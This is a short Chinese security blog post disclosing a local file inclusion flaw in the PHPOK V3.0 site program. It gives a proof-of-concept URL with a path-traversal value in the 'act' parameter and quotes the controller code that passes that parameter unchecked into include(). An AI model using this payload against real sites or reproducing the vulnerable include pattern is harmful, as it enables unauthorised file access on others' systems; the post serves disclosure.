PHPOK V3.0 企业站程序本地文件包含漏洞

2021年4月3日18:55:59评论51 views字数 631阅读2分6秒阅读模式

http://127.0.0.1/index.php?c=js&f=index&act=/../123

看代码：

appwwwcontroljs.php
function index_f()
        {
                $act = $this->trans_lib->safe("act");
                if(file_exists(ROOT_JS.$act.".php"))
                {
                        include(ROOT_JS.$act.".php");
                }
                else
                {
                        echo "ERROR";
                }
                exit();
        }

刚看了一下后台，没发现可利用地方，虽然已经达成加载全局函数条件。

文章来源于lcx.cc:PHPOK V3.0 企业站程序本地文件包含漏洞

相关推荐: 【VB】PopupMenu: 弹出菜单的方法详解

VB PopupMenu 用来显示弹出菜单语法格式： object.PopupMenu menuname, flags, x, y, boldcommand 参数详解： Object 对象，窗体名。 Menuname …

左青龙
微信扫一扫

右白虎
微信扫一扫

PHPOK V3.0 企业站程序本地文件包含漏洞

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信